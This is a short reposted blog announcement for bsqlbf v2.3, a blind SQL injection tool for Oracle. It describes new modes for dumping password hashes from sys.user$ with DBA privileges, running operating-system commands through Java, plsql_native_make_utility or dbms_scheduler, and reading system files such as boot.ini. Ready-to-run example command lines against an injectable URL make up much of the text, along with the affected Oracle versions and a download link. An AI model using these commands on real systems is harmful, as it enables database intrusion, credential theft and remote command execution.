Bsqlbf v 2.3 With Enhanced Oracle Exploitation

From: http://www.pcsec.org/archives/Bsqlbf-v-23-With-Enhanced-Oracle-Exploitation.html

A new version of bsqlbf is now available. The following are the new additions:

 

Posted by Sid

 

--------------------type:        Type of injection:3:      Type 3  is extracting data with DBA privileges(e.g. Oracle password hashes from sys.user$)4:      Type 4 is O.S code execution(default: ping 127.0.0.1)5:      Type 5 is Reading O.S files(default: c:\boot.ini)--------------------Type 4 (O.S code execution) supports the following sub types:-stype:        How you want to execute command:0:      SType 0 (default) is based on java,universal but won't work against XE1:      SType 1 against oracle 9 with plsql_native_make_utility2:      SType 2 against oracle 10 with dbms_scheduler

———————-

Examples:

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 3 -match “true” -sql “select password from sys.user$ where rownum=1″

./bsqlbf-v2.3.pl -url http://192.168.1.1/injection.jsp/1.jsp?p=1 -type 4 -match “true” -cmd “ping notsosecure.com”

./bsqlbf-v2.3.pl -url http://192.168.1.1/injecti.jsp/1.jsp?p=1 -type 5 -match “true” -file “C:\boot.ini”

———————

Download from Project Homepage: http://code.google.com/p/bsqlbf-v2/

———————

All these additions are based on dbms_export_extension exploit. This will work against the following oracle versions:

Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE

————————

Enjoy…